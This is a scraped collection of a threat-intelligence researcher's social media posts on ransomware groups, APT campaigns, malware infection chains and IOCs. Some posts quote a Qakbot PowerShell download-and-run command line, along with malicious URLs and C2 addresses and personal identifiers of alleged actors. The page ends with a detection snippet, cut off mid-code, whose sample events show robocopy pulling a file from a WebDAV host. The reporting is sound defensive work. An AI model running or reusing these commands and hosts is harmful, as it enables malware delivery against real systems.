"🚨Here is my analysis on GLOBAL GROUP RaaS. I identified the IP address behind their Tor-based Dedicated Leak Site (DLS): 193.19.119.4. The server is hosted by IpServer, a Russia-based VPS provider also previously used to host the DLS infrastructure for the Mamona RIP ransomware operation. The GLOBAL GROUP RaaS manager (alias $$$) actively seeks remote access to corporate networks via Initial Access Brokers (IABs), targets enterprise VPN appliances (Fortinet, Palo Alto, Cisco) and routinely acquires RDP access to high-value targets."  
[X Link](https://x.com/anyuser/status/1945029879163965470)  2025-07-15T07:57Z [----] followers, 16.6K engagements


"EclecticIQ links GLOBAL GROUP to the actor behind BlackLock RaaS. This group uses AI-powered ransom negotiations & a mobile control panel targeting healthcare & automotive sectors in the US UK and Europe. 👉 Learn more: #cybersecurity #ransomware https://hubs.ly/Q03xcYK00"  
[X Link](https://x.com/anyuser/status/1945014214663283108)  2025-07-15T06:55Z [----] followers, 10.6K engagements


"@vxunderground The page used some Turkish language and it appears that the CSS code was copied and pasted from a random Turkish forum"  
[X Link](https://x.com/anyuser/status/1655691557289226248)  2023-05-08T21:50Z [----] followers, [----] engagements


"Don't touch our home routers dude it's creepy 😐. According to Microsoft the Chinese APT group Volt Typhoon camouflages its command-and-control (C2) network activities by compromising small office and home office (SOHO) network equipment. The previous report highlights that Volt Typhoon employs a modified version of the Fast https://t.co/6RoMEnu5Un"  
[X Link](https://x.com/anyuser/status/1789393023568068855)  2024-05-11T20:31Z [----] followers, [----] engagements


"google-drive.zip 😂 @malwrhunterteam"  
[X Link](https://x.com/anyuser/status/1659638202188152832)  2023-05-19T19:12Z [----] followers, [----] engagements


"Fresh #GOZI sample with [--] detection in VT. Execution flow: ZIP (QuickBooks-IXAUYWQ) -> LNK -> msiexec MD5: 82ff84cb9924f0855a894e75b5d3edb2 C2: sumarno.top @malwrhunterteam @StopMalvertisin @1ZRR4H https://tria.ge/230525-2j1x5sdd61/behavioral1"  
[X Link](https://x.com/anyuser/status/1661866708997423106)  2023-05-25T22:47Z [----] followers, [----] engagements


"2nd stage of PowerShell Bumblebee loader de-obfuscated, feel free to take a look: cc @Gi7w0rm @malwrhunterteam @BushidoToken https://gist.github.com/whichbuffer/0c109be7b8b01d13178c07d66cdf82d5"  
[X Link](https://x.com/anyuser/status/1567427989939408896)  2022-09-07T08:22Z [----] followers, [--] engagements


"@malwrhunterteam @JAMESWT_MHT I also wanted to mention an awesome tool called HashDB I used for reverse engineering the API hashing @herrcore, it sped up the analysis process 👏 Lockbit Decrypter was using the "FNV-1a non-cryptographic hash function" for hiding the import tables. https://github.com/OALabs/hashdb"  
[X Link](https://x.com/anyuser/status/1538857157566906369)  2022-06-20T12:11Z [----] followers, [--] engagements


"I can confirm that the latest patch #microsoft #windows CVE-2022-26925 was related to PetitPotam, found by @topotam77. An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate to the attacker using NTLM"  
[X Link](https://x.com/anyuser/status/1524279869185609729)  2022-05-11T06:46Z [----] followers, [--] engagements


"@h4x0r_dz It's not from Microsoft for sure 😅"  
[X Link](https://x.com/anyuser/status/1783576824787722494)  2024-04-25T19:20Z [----] followers, 13.6K engagements


"Likely an APT-C-55 (Kimsuky) activity: ISO -> LNK -> BAT -> AV vendor check (Kaspersky or Avast) -> Download Second Stage (HTA) MD5: 5b39fc810261ce179e8348e11a840c15 URL: trusteer.ink/rapport/32.hta Previous activity similar to this: MD5: 7753f37dfbc44815282433f16b56c0ce"  
[X Link](https://x.com/anyuser/status/1658531073590976519)  2023-05-16T17:53Z [----] followers, [----] engagements


"🕷🕸SCATTERED SPIDER phishing activities: Registrar: - Hosting Concepts B.V. d/b/a Registrar EU iuiuiemon.com - 2024-11-13 vision-victra.com - 2024-11-09 cc @BushidoToken @malwrhunterteam @TLP_R3D @AlvieriD @ImposeCost"  
[X Link](https://x.com/anyuser/status/1861060536776999256)  2024-11-25T14:53Z [----] followers, [----] engagements


"More Raccoon Stealer IOCs 🦝 MD5 Hash: 5261d68f844325d038c8b1d7d215a91e C2 Servers: 94.131.104.18 45.67.229.149 Downloader: http://193.149.129.144/rgd4rgrtrje62iuty/19658963328526236.bin cc @malwrhunterteam @malware_traffic"  
[X Link](https://x.com/anyuser/status/1571527103761518593)  2022-09-18T15:50Z [----] followers, [--] engagements


"Pivoting on possible Volt Typhoon infrastructure. Each piece of infrastructure is using: SSL certificate C=en ST=rg L=df O=vb OU=ty CN=jdyfj, nginx 1.20.1, and a redirect to google 2.58.15.30 66.85.27.190 45.32.174.131 cc @DrunkBinary @TomHegel @BushidoToken"  
[X Link](https://x.com/anyuser/status/1783603581653746037)  2024-04-25T21:06Z [----] followers, [----] engagements


"Russian cybercriminals behind the DanaBot malware built a version specifically to target government and military entities. There's no direct proof Russian intelligence is involved, but it's likely they benefit from or use the tools and access to these backdoored systems. https://www.justice.gov/usao-cdca/pr/16-defendants-federally-charged-connection-danabot-malware-scheme-infected-computers"  
[X Link](https://x.com/anyuser/status/1925996443103371384)  2025-05-23T19:25Z [----] followers, [----] engagements


"Reversing a Go binary in IDA. We can see that it's being used for getting Initial Access on the victim device by communicating with C2_IP over port [----], and Powershell.exe will be used as the default Command and Scripting Interpreter by the attacker. @malwrhunterteam"  
[X Link](https://x.com/anyuser/status/1552372042544156673)  2022-07-27T19:15Z [----] followers, [--] engagements


"The SAP NetWeaver exploit (CVE-2025-31324) is seriously bad. I've seen some of the targets; it's horrifying. There are critical infrastructure networks affected 😬"  
[X Link](https://x.com/anyuser/status/1917710109054230876)  2025-04-30T22:38Z [----] followers, [----] engagements


"There is a lot of disinformation and counterintelligence activity circulating in Telegram channels. If you are a journalist or a CTI analyst, stay cautious: your role is to provide accurate information, not to amplify the hype"  
[X Link](https://x.com/anyuser/status/1958524220918407320)  2025-08-21T13:38Z [----] followers, [----] engagements


"Just use Linux nerds"  
[X Link](https://x.com/anyuser/status/1814233813125329165)  2024-07-19T09:40Z [----] followers, [----] engagements


"Rhadamanthys info stealer malware using an EU GDPR phishing lure. After execution it opens a PDF document as part of the lure. C2: 141.98.82.254 41f7c8ae34676fe524a70b8474e1c31c42d70301edf091c1e8ae320b7f3d1646"  
[X Link](https://x.com/anyuser/status/1608089945985486852)  2022-12-28T13:18Z [----] followers, [----] engagements


"@hackerfantastic lmao"  
[X Link](https://x.com/anyuser/status/1898080429972111628)  2025-03-07T18:36Z [----] followers, [----] engagements


"PlugX Payload (work2022.tmt) is encrypted with the XOR key "0x1E43"; it's being decrypted by the PlugX loader "LMIGuardianDLL.dll" on execution. The decrypted payload can be found here, and the decrypted PlugX config file can be seen in the image https://www.virustotal.com/gui/file/a9f7d06b9929be61853910876129318ef56efd1eaef168e9ac412a090a6f09da?nocache=1 #MustangPanda #APT Summary MSs reporting - recommendationl.zip ecb1650d5f548f10be47aaa84f7546c0 Summary MSs reporting - recommendationl.doc.lnk 2db2698bd4c922a04db0839e6fc1146b LMIGuardianDll.dll aa47fc240f70945b80413ac3c714e2a2 LMIGuardianDat.dat"  
[X Link](https://x.com/anyuser/status/1611006137112961027)  2023-01-05T14:26Z [----] followers, [----] engagements


"#MustangPanda #APT Summary MSs reporting - recommendationl.zip ecb1650d5f548f10be47aaa84f7546c0 Summary MSs reporting - recommendationl.doc.lnk 2db2698bd4c922a04db0839e6fc1146b LMIGuardianDll.dll aa47fc240f70945b80413ac3c714e2a2 LMIGuardianDat.dat"  
[X Link](https://x.com/anyuser/status/1610961056163311619)  2023-01-05T11:27Z 16.4K followers, 21.1K engagements


"Ukrainian City Councils (Pechersk and Khmelnytskyi) were very likely targeted by an unknown threat actor. A spear-phishing email was used to deliver an encrypted RAR attachment containing Remcos RAT. https://www.virustotal.com/gui/file/af600672e924a603bd96687954d7bb26950f1e891d923bff99981a91a0626026"  
[X Link](https://x.com/anyuser/status/1628838062586228736)  2023-02-23T19:23Z [----] followers, [----] engagements


"Qilin ransomware affiliate hastalamuerte claims he lost $48K after a ransom negotiation mysteriously disappeared from a Tox chat. In the same thread another actor, Nova, posted credentials and a screenshot of Qilin's affiliate panel to embarrass the group. ji57fr53anp7wb44tbbnp72qcgbhqywy4jmbncawdcrejj5amuvh3zqd.onion"  
[X Link](https://x.com/anyuser/status/1950934137881207205)  2025-07-31T14:58Z [----] followers, [----] engagements


"CheckZilla is being used by threat actors for calculating the evasiveness of a #Malware automatically; the idea is that, unlike VirusTotal, it doesn't send metadata to AV vendors. CheckZilla is also being advertised on the RAMP forum. @malwrhunterteam @JAMESWT_MHT"  
[X Link](https://x.com/anyuser/status/1543163545948508164)  2022-07-02T09:23Z [----] followers, [--] engagements


"Arkana Ransomware affiliates likely targeted the WideOpenWest (ISP in California) by compromising Appian (code automation platform) and Symphonica (cloud-native orchestration platform). Some key cloud security takeaways: 1- Avoid exposing company identifiers (e.g. name SSL certs logo) in cloud assets. 2- Continuously monitor for leaked or reused credentials. 3- Audit third-party SaaS configurations and access permissions regularly. 4- Use 2FA :( cc @BushidoToken @vxunderground @DrunkBinary @LawrenceAbrams https://web.archive.org/web/20250324043643/https://wowinc.appiancloud.com/suite/ Arkana"  
[X Link](https://x.com/anyuser/status/1904456464539832659)  2025-03-25T08:52Z [----] followers, [----] engagements


"Arkana ransomware group claims to have compromised an Internet Service Provider in California. They were even nice enough to put together a music video montage illustrating the level of access they possess"  
[X Link](https://x.com/anyuser/status/1904364394709999970)  2025-03-25T02:47Z 418K followers, 63.1K engagements


"I'm following a generic backdoor that I named as "Kerper" because of the PDB file path. The C2 connections depend on the variations. So far I have seen that Microsoft Graph API and Microsoft Azure (akams.azurewebsites.net) services were abused"  
[X Link](https://x.com/anyuser/status/1641491946534215680)  2023-03-30T17:25Z [----] followers, [----] engagements


"YARA rule to detect this new campaign. https://github.com/whichbuffer/eiq-community-exchange/blob/30d58253c6bc29bf223fd55c4af6ac0701b537e6/yara/Windows_1000-1999/Y1801.yara#L70 #Qakbot - BB14 - .one .cmd .ps .dll cmd.exe /c Open.cmd powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg rundll32 C:\programdata\putty.jpg,Wind IOC's https://t.co/iJ3jXKg9aB https://t.co/5kmcgUPnIh"  
[X Link](https://x.com/anyuser/status/1623092200568508418)  2023-02-07T22:51Z [----] followers, [----] engagements


"#Qakbot - BB14 - .one .cmd .ps .dll cmd.exe /c Open.cmd powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg rundll32 C:\programdata\putty.jpg,Wind IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB14_07.02.2023.txt"  
[X Link](https://x.com/anyuser/status/1623075145773379584)  2023-02-07T21:44Z 21.1K followers, 34.6K engagements


"🎉 Happy to share that my talk has been accepted at @virusbtn. I'll be presenting in Berlin on Friday September [--] at #VB2025. Details: https://www.virusbulletin.com/conference/vb2025/abstracts/cracked-gru-how-russias-notorious-sandworm-unit-weaponizes-pirated-software-usage-target-ukraine/ See you there #vbconference"  
[X Link](https://x.com/anyuser/status/1918308833744552439)  2025-05-02T14:17Z [----] followers, [----] engagements

Top assets mentioned Microsoft Corp. (MSFT) Crowdstrike Holdings Inc (CRWD) Cloudflare, Inc. (NET) Alphabet Inc Class A (GOOGL) CyberConnect (CYBER) OORT (OORT) Raytheon Technologies Corp (RTX)

### Top Social Posts

Top posts by engagements in the last [--] hours

"@malwrhunterteam @ShadowChasing1 @h2jazi @cyb3rops Here is the decrypted C2 URL: hxxps://cryptyk.ddns.net It's being stored inside the PDF file and Encrypted with [---] byte long XOR key decryption done by encrypt_pdf function upon execution of malware"
X Link 2023-05-12T11:13Z [----] followers, [---] engagements

"Malware Deobfuscation with @OpenAI Remcos malware delivery via ISO -> Obfuscated VBS -> Powershell Download Second Stage -> Inject into ielowutil.exe Injected Remcos: https://tria.ge/230812-t6nmbscf33/static1"
X Link 2023-08-12T16:46Z [----] followers, 15K engagements

"@ImposeCost It's Turkish barber shops doing ASMR videos :p you can search them in your area but I don't think you can find it in Virginia"
X Link 2023-09-10T17:05Z [--] followers, [--] engagements

"Backdoor found in XZ Utils versions 5.6.0 and 5.6.1 that is leading to ssh server compromise. This activity was assigned CVE-2024-3094. XZ Utils is data compression software 👀"
X Link 2024-03-29T20:44Z [----] followers, [----] engagements

"Testing the XZ Utils backdoor kill switch (yolAbejyiejuvnup=Evjtgvsh5okmkAvj): this string stops the backdoor so it won't hook into the RSA_public_decrypt() function"
X Link 2024-04-01T09:26Z [----] followers, 62K engagements

"Subdomain enumeration with an open source tool called SubEnum -> F5 BIG-IP (CVE-2023-46747) exploit -> ARP scan on internal network after the exploit -> Port / Service enumeration -> Lateral movement to MSSQL Database Server -> Credential dump from MSSQL server -> RDP into MSSQL server -> data exfiltration. Linked to the Cyber Court and Makhlab al-Nasr pro-Palestinian hacking group. cc @BushidoToken #BREAKING A hacker group named Makhlab_al_Nasr has hacked the data of [--] million Israelis including: 1-their personal information 2-bank account details 3-residential addresses and more which are now at the disposal of the"
X Link 2024-04-04T09:26Z [----] followers, 53.4K engagements

"@utkusen https://www.virustotal.com/gui/file/3fe7211742fc790d5b26b04bc4a1f707abd1fd6ae27b79947a842c9863a94711/details"
X Link 2024-04-13T19:18Z [----] followers, [----] engagements

"@utkusen I found this only from the name similarity, so I don't know for sure whether this malware was actually the one used or a different one. CrowdStrike would most likely catch it"
X Link 2024-04-13T20:41Z [----] followers, [--] engagements

"Cyber Army of Russia Reborn (CARR) is a hacktivist Telegram persona associated with #APT44 by @Mandiant. CARR prepared a training for DDoS attacks against Ukrainian targets; you can see the username of the device is "SergoZar", which is likely associated with GitHub user "SergoZar". Persona "SergoZar" is using a public portfolio page and following himself, which is Mr. Alexander Ryabov aka "ZKelo" or "SergoZar". It's just an assumption, I'm not linking Cyber Army of Russia Reborn (CARR) to this gentleman, but for me this profile is matching an interesting link. What do you think @BushidoToken"
X Link 2024-04-19T21:31Z [----] followers, 18.5K engagements

"🤣cc @herrcore https://github.com/NationalSecurityAgency/ghidra/assets/42712921/ba4acc7f-f7d5-4cdf-be86-44eb503fe0cc"
X Link 2024-04-21T10:13Z [----] followers, [----] engagements

"@ThisMyHandle @herrcore It's TLP:RED? Nah, just open an issue and upload your stuff in that comment, then copy the link. Here you go, magic"
X Link 2024-04-21T12:29Z [----] followers, [---] engagements

"According to Microsoft the Chinese APT group Volt Typhoon camouflages its command-and-control (C2) network activities by compromising small office and home office (SOHO) network equipment. The previous report highlights that Volt Typhoon employs a modified version of the Fast Reverse Proxy (FRP) to maintain persistent access to victim networks. When I analyzed the UPX-packed FRP sample referenced in the report I discovered the string 'MAGA2024' alongside a hardcoded 64.183.202.102 C2 IP address. This IP is linked to an SSL certificate for a 'Vigor Router' and with a location metadata as"
X Link 2024-05-11T19:44Z [----] followers, 75.6K engagements

"Microsoft Report: UPX Packed FRP: 472ccfb865c81704562ea95870f60c08ef00bcd2ca1d7f09352398c05be5d05d Unpacked FRP: a0e581c0698a64bcb97f239172b31ed9009de1a89ba0d0e1e2fce2dfc6a496c0 C2 IP: 64.183.202.102 cc @BushidoToken https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/"
X Link 2024-05-11T19:44Z [----] followers, [----] engagements

"@BushidoToken With low confidence, since the compromised C2 IP is a DrayTek Vigor2960 Series router, the threat actor probably used the CVE-2020-19664 RCE. https://github.com/peanuts62/bug_poc"
X Link 2024-05-11T21:20Z [----] followers, [----] engagements

"I woke up and looked at my livehunt alerts in VT. I saw the confidential emails accidentally uploaded by one of the Five Eyes countries. I shut down my laptop and took a walk"
X Link 2024-05-30T20:45Z [----] followers, [---] engagements

"The rise of the far-right movements in Europe. Interesting political trend to watch. The state of France this evening: this shows the party that came top in voting for the European Parliament on June [--] in every commune in France. Brown represents the far right https://t.co/PP0C5KjrIW"
X Link 2024-06-09T21:26Z [----] followers, [---] engagements

"@RussianPanda9xx That's why I love the CTI community 😎"
X Link 2024-06-19T04:45Z [----] followers, [---] engagements

"@jamieantisocial @Gi7w0rm @DrunkBinary @AShukuhi Thank you 😊"
X Link 2024-06-20T06:41Z [----] followers, [---] engagements

"🌟 Exciting Announcement! I am happy to share that I will be attending and presenting at the ENISA Cyber Threat Intelligence (CTI) for Europe conference on October 1st. The event will be held at the Hotel Thon Bristol Stephanie in Brussels, Belgium. I will present my latest research on the "Rebranding of the Caffeine Phishing Kit Targeting Financial Institutions." This topic is part of the session on using open-source intelligence (OSINT) and technical intelligence (TECHINT) for analysis, scheduled from 11:30 to 12:30. Join me and other industry experts as we delve into the latest developments in"
X Link 2024-07-13T09:00Z [----] followers, [---] engagements

"I created a simple Group Policy (GPO) to automatically fix the CrowdStrike BSOD (Blue Screen of Death) issue. https://gist.github.com/whichbuffer/7830c73711589dcf9e7a5217797ca617 BREAKING: The US Aviation Authority has required all flights to land due to a technical computer glitch. https://t.co/dPVzkhHZAS"
X Link 2024-07-19T08:20Z [----] followers, 120.4K engagements

"Fake CVE exploit POCs, especially for high-profile vulnerabilities like CVE-2024-38063, are unfortunately a common tactic used by malicious actors to distribute malware over GitHub. https://www.virustotal.com/gui/file/0dfa551e2b12af0991714a3e5be26c9a4c00f7663f065dbf4d8b84c9abc7b97a/detection"
X Link 2024-08-17T21:40Z [----] followers, 18.6K engagements

"🚨 Beware: Threat actors are using PDFs to lure victims into installing the FleetDeck RMM tool. These malicious PDFs embed a URL (agent.fleetdeck.io) behind a button, tricking users into clicking and downloading the FleetDeck executable. Once installed, this remote management tool could give attackers control over your device. #CyberSecurity #PhishingAlert"
X Link 2024-08-22T21:38Z [----] followers, [--] engagements

"Here is one that targets users in the Netherlands in the Dutch language. They are using a real estate lure this time. The same author was observed over and over: "Dennis Block""
X Link 2024-08-22T21:44Z [----] followers, [---] engagements

"🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity #ThreatIntelligence #Ransomware #CloudSecurity https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries"
X Link 2024-09-10T15:37Z [----] followers, 37.6K engagements

"I've outlined the full Ransomware Deployment Life Cycle for cloud environments, detailing key stages of attack, persistence and execution. Also don't miss the deep dive on Telecom Enemies, a Developer-as-a-Service (DaaS) group empowering phishing and cyberattacks using tools like the Gorilla Call Bot for vishing attacks. Their influence is growing within underground forums. 🕸💻 Check out my latest analysis on how SCATTERED SPIDER targets cloud infrastructures in the financial and insurance sectors. https://t.co/awFf6sUDYB cc @BushidoToken @Gi7w0rm @TomHegel @AShukuhi @UK_Daniel_Card #CyberSecurity"
X Link 2024-09-10T15:40Z [----] followers, 14.1K engagements

"It seems like someone popped OpenAI's X account to spread some crypto scam. Remember kids, there is no free or easy money. Stay safe ☢"
X Link 2024-09-23T22:35Z [----] followers, [----] engagements

"Today I had the privilege of presenting at the ENISA CTI Conference in Brussels. It was a fantastic experience with insightful speakers and excellent networking opportunities"
X Link 2024-10-01T17:07Z [----] followers, [---] engagements

"The costs of fragmentation: as trade falls and barriers rise, global growth will likely take a severe hit in coming years. According to the latest International Monetary Fund projections, annual global GDP growth in [----] will be only three percent, the IMF's lowest five-year-ahead forecast in the past three decades, which spells trouble for poverty reduction and for creating jobs among burgeoning populations of young people in developing countries. Fragmentation risks making this already weak economic picture even worse. As growth falls, opportunities vanish and tension builds, the world, already divided by"
X Link 2024-10-27T15:39Z [----] followers, [---] engagements

"🚨🕷 Proud to share my latest research on the LUNAR SPIDER campaign. Our findings reveal how RaaS operators leveraged LUNAR SPIDER's malware, including IcedID and the Latrodectus loader, along with Brute Ratel C4 infrastructure to enable their attacks on the financial sector. cc @BushidoToken @HackingLZ @cyb3rops @MichalKoczwara @RussianPanda9xx @ddd1ms @jstrosch https://blog.eclecticiq.com/inside-intelligence-center-lunar-spider-enabling-ransomware-attacks-on-financial-sector-with-brute-ratel-c4-and-latrodectus"
X Link 2024-10-30T13:11Z [----] followers, 31.8K engagements

"🚨 New threat research: SilkSpecter, a likely China-based threat actor, is targeting EU & US e-commerce shoppers for financial fraud by using fake Black Friday sites to steal victims' debit and credit card details. https://blog.eclecticiq.com/inside-intelligence-center-financially-motivated-chinese-threat-actor-silkspecter-targeting-black-friday-shoppers"
X Link 2024-11-14T14:50Z [----] followers, 10.8K engagements

"The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence, confirming his role in the group's credential theft campaigns. cc @BushidoToken https://www.documentcloud.org/documents/25355101-usa-v-buchanan-complaint-redacted"
X Link 2024-11-20T19:38Z [----] followers, 37.3K engagements

"Phishing domain tmobiie.us was created by Tyler Robert Buchanan aka "bobsagetfaget" or "BUCHANAN". You can see the reverse whois lookup result. The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence, confirming his role in the group's https://t.co/HUQgImtn5P"
X Link 2024-11-20T19:51Z [----] followers, 18.5K engagements

"Very Similar domains over here: tmobiie.com staging.tmobiie.com mintmobiie.com tmobiie.net americafirstmobiie.com okta-tmobiie.net okta.tmobiie.net"
X Link 2024-11-20T19:56Z [----] followers, [---] engagements

"After using some cool network pivoting tricks and a zero-day privilege escalation, the threat actor leveraged the noisy reg.exe to dump SAM credentials and PowerShell to compress the results. https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/"
X Link 2024-11-22T18:21Z [----] followers, [----] engagements

"🕷🕸SCATTERED SPIDER phishing activities: Registrar: Hosting Concepts B.V. d/b/a Registrar EU. iuiuiemon.com - 2024-11-13; vision-victra.com - 2024-11-09. cc @BushidoToken @malwrhunterteam @TLP_R3D @AlvieriD @ImposeCost"
X Link 2024-11-25T14:53Z [----] followers, [----] engagements

"Threat actors exploit GlobalProtect (CVE-2024-3400) to deliver the Sliver C2 malware (up.js). By leveraging a compromised VICIdial server, the threat actor likely exploited CVE-2024-8504 to store their payloads on a legitimate server (104.131.69.106/vicidial/up.js)"
X Link 2024-12-05T18:17Z [----] followers, 14.7K engagements

"Supply chain attempt on the ultralytics PyPI package. The attacker opened a pull request and pushed a commit with a malicious name, leading to CI code injection. They then backdoored versions 8.3.41 and 8.3.42 with code downloading a second-stage binary from GitHub. https://github.com/ultralytics/ultralytics/pull/18020"
X Link 2024-12-05T19:34Z [----] followers, [----] engagements

"🕵Gamaredon #APT activity targeting the State Bureau of Investigation in Ukraine (DBR or ): Phishing email - XHTML Smuggling Payload - Download RAR - LNK - MSHTA LOLBIN - Download third stage. Email: 27515d71b91bbdbb55437de6b729663c0cd206d7112ddbc439d82d8a6e1dde3e HTML Payload: b5d59bb932843ca58c29971e73edfe642731701f29133eb1cfb8841e198d567f Download Second Stage RAR file from: entities-important-surgeon-ever.trycloudflare.com LNK File: 35f714c491897d32c7c68386dac02615071ae4587729dc46d524c6e468ac1cbe"
X Link 2024-12-06T14:41Z [----] followers, [----] engagements

"With the fall of the Assad regime in Syria, the status of Russia's critical military installations, most notably the Tartus naval base and the Hmeimim Air Base, has become uncertain. Although current satellite imagery does not indicate an immediate departure, a full Russian withdrawal in the near future appears increasingly likely. Such a move would seriously compromise Moscow's corridor into Africa, curtailing its ability to maintain logistical operations in Libya and to project power across the Mediterranean. Should Russia attempt to evacuate its naval presence, Turkish restrictions at the Bosphorus"
X Link 2024-12-11T19:04Z [----] followers, [---] engagements

"An unknown threat actor is leveraging OORT infrastructure, a US-based decentralized cloud solution actively used by Chinese users, to deliver Word documents embedded with QR codes. These documents use HR-related lures to target South Korean entities, aiming to execute phishing attacks. IOC: employee-benefits-package.archive.us-east-1.oortech.com 321719a387926235b0bca136b971d870e3ac1966a878fb9b2dc4b5bbc84cf517 bee2d564b8b84d4598decc0ed03a384a50cae84a5507ef2302aa1141fb46a378 c074608fdc2aaf7dc01f99002ac7e73ab372e8fe538161ba715446c17fcda2f6"
X Link 2024-12-12T17:45Z [----] followers, [---] engagements

"Summary of the Treasury Department breach (per public sources): A key unresolved cybersecurity issue lies in securing third-party vendor relationships. cc @BushidoToken @DrunkBinary @cyb3rops @TLP_R3D"
X Link 2025-01-06T19:21Z [----] followers, [----] engagements

"From the BlackBasta chat logs I obtained access to GoblinCrypt, a private malware encryption tool used to bypass EDR/AV. With it I pivoted into each malware sample and C2 address. Here's the full https://gist.github.com/whichbuffer/20820e3c0ad52c0a4496fa64dd2a01bf"
X Link 2025-02-22T15:58Z [----] followers, 36.3K engagements

"A threat actor has been observed targeting Colombian government entities, including Consorcio Fopep under the Ministry of Labor, via a phishing campaign that uses malicious SVG email attachments. When a victim opens the attached SVG file, it downloads a second-stage malware payload packaged inside a password-protected ZIP archive. This payload initiates the delivery of the Remcos Remote Access Trojan (RAT) via DLL sideloading. The threat actor abused ciscosparklauncher.dll to launch the Remcos RAT. Additionally, they loaded the vulnerable driver zamguard64.sys, associated with Zemana Anti-Malware, to"
X Link 2025-04-12T20:50Z [----] followers, 10.1K engagements

"Sri Lanka Ministry of Foreign Affairs hit by a phishing attack. The email, titled "HIGHLY CONFIDENTIAL - Rotation of Sri Lankan Peacekeepers and Human Rights Clearance", came from a Microsoft [---] account belonging to Pakistan's Naval University "pro-rector.admin@bahria.edu.pk". The phishing email used an embedded image designed to mimic a Gmail message with an attachment. In reality the image linked to a malicious URL: "gs23-production.up.railway.app/fgefwegfwefa33hh23=". This link briefly led to a PDF file before redirecting the user to a fake Gmail login page to steal their credentials. The"
X Link 2025-04-23T18:38Z [----] followers, [----] engagements

"The SAP NetWeaver exploit (CVE-2025-31324) is seriously bad. I've seen some of the targets, it's horrifying. There are critical infrastructure networks affected 😬"
X Link 2025-04-30T22:38Z [----] followers, [----] engagements

"🚨 Luna Moth is back hitting U.S. law & finance firms with callback phishing: - Deceive victims into calling fake IT helpdesks - Abuse GoDaddy infra & Reamaze AI chatbots for social engineering - Live operators guide victims to install RMM tools - WinSCP & Rclone for data exfiltration - Data theft followed by extortion through threats to publish on a data leak site (DLS). https://blog.eclecticiq.com/from-callback-phishing-to-extortion-luna-moth-abuse-reamaze-helpdesk-and-rmm-tools-against-u.s.-legal-and-financial-sectors"
X Link 2025-05-01T10:52Z [----] followers, 35K engagements

"Multiple Chinese nation-state APT groups have gained initial access to critical infrastructure networks through SAP NetWeaver intrusions, aiming to conduct cyber-enabled espionage and maintain persistent remote access. https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures"
X Link 2025-05-13T12:03Z [----] followers, 94.4K engagements

"🚨UNC5221, a China-Nexus Threat Actor, is Actively Exploiting Ivanti EPMM (CVE-2025-4428). Victims include: - Germany's top telecom provider & defense contractors - UK healthcare institutions tied to the NHS - U.S. pharma, aviation and mobile security companies - Leading APAC banks and automotive tech firms - Multiple EU local governments & research institutes https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability"
X Link 2025-05-21T15:23Z [----] followers, 40.5K engagements

"Ivanti EPMM stored MySQL creds in cleartext (/mi/files/system/.mifpp). Threat actors accessed the DB and exfiltrated mobile device metadata (IMEI, SIM, location), LDAP configs and Office [---] tokens from potentially thousands of victims. Read more here: https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability"
X Link 2025-05-22T07:20Z [----] followers, [----] engagements

"The Pakistan Airports Authority (PAA) appears to have been compromised, with their email infrastructure being used to distribute password-protected ZIP archives containing previously undocumented malware. The payload is disguised with an .MCU file extension, masquerading as a legitimate Excel document. The phishing campaign leverages a lure titled "Telecom Sector Collaboration for Aviation Modernization", clearly tailored to target the telecommunications industry within Pakistan. Interestingly, I found an easter egg inside the remote host: the threat actor behind the campaign claims affiliation with"
X Link 2025-06-12T23:08Z [----] followers, 22.4K engagements

"EntroLink is a South Korean network security company that developed the PPX-AnyLink VPN appliance. As of recent Shodan scans, approximately [--] devices remain exposed, most of them located in South Korea. In [----], ransomware groups such as LockBit and BlackMatter exploited another RCE vulnerability in PPX-AnyLink, enabling root-level access to victim networks. https://therecord.media/ransomware-gangs-are-abusing-a-zero-day-in-entrolink-vpn-appliancesutm_source"
X Link 2025-06-13T19:25Z [----] followers, [---] engagements

"Threat actors actively abuse "Robocopy" (a built-in Windows utility) to deliver malware from WebDAV. You can quickly detect this behavior by using this SIGMA rule: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml Malware Sample: https://bazaar.abuse.ch/sample/62fce3f773ec3911fe1a20d3aca1fced6c1a5afa4d8f58711e49232b7dc9c111"
X Link 2025-06-30T12:54Z [----] followers, [----] engagements
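A small detection check for the Robocopy-from-WebDAV behaviour the post describes, added here as an example; it is not the author's code and not the SigmaHQ rule linked above. It scans constructed Sysmon-style process-creation events for robocopy.exe launched with a WebDAV UNC source (the Windows mini-redirector forms `\\host@SSL\...`, `\\host@80\...`, or a `DavWWWRoot` path); the event fields and all sample values are constructed.

```python
import re
from dataclasses import dataclass

# Constructed Sysmon-style process-creation events (not real telemetry).
# Events 1 and 2 show robocopy.exe pulling from a WebDAV UNC path; event 3 is
# a benign local-to-local mirror and must not be flagged.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\robocopy.exe",
     "CommandLine": r'robocopy.exe "\\203.0.113.10@80\DavWWWRoot\share" C:\Users\Public\Music update.exe',
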